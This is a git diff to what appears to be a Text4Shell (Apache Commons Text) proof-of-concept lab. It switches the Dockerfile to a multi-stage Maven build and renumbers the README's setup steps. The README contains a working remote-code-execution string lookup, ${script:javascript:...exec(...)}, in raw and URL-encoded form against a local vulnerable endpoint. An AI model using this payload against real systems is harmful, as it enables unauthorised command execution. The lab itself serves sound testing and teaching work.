diff --git a/Dockerfile b/Dockerfile index a31999b..7ed5626 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,3 +1,9 @@ +# Build the jar File +FROM maven:3.8.6-eclipse-temurin-8-alpine as build +WORKDIR /app +COPY . /app +RUN mvn clean install + # Use an official OpenJDK runtime as a parent image FROM openjdk:8-jre-alpine @@ -9,10 +15,10 @@ RUN apk update && apk add bash WORKDIR /app # Copy the fat jar into the container at /app -COPY /target/text4shell-poc.jar /app +COPY --from=build /app/target/text4shell-poc.jar /app # Make port 8080 available to the world outside this container EXPOSE 8080 # Run jar file when the container launches -CMD ["java", "-jar", "text4shell-poc.jar"] \ No newline at end of file +CMD ["java", "-jar", "text4shell-poc.jar"] diff --git a/README.md b/README.md index 2452d91..7e43d0f 100644 --- a/README.md +++ b/README.md @@ -1,32 +1,26 @@ ### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu) -------------- +--- -1. Maven install to create the fat jar - -``` -mvn clean install -``` - -2. Docker build +1. Docker build ``` docker build --tag=text4shell . ``` -3. Docker run +2. Docker run ``` docker run -p 80:8080 text4shell ``` -4. Test the app +3. Test the app ``` http://localhost/text4shell/attack?search= ``` -5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: +4. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: ``` ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} @@ -34,28 +28,28 @@ ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D -6. You can also try using `dns` or `url` prefixes. +5. You can also try using `dns` or `url` prefixes. -7. Get the container id +6. Get the container id ``` docker container ls ``` -8. Get into the app +7. Get into the app ``` docker exec -it bash ``` -9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): +8. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): ``` ls /tmp/ ``` -10. To stop the container +9. To stop the container ``` docker container stop -``` \ No newline at end of file +```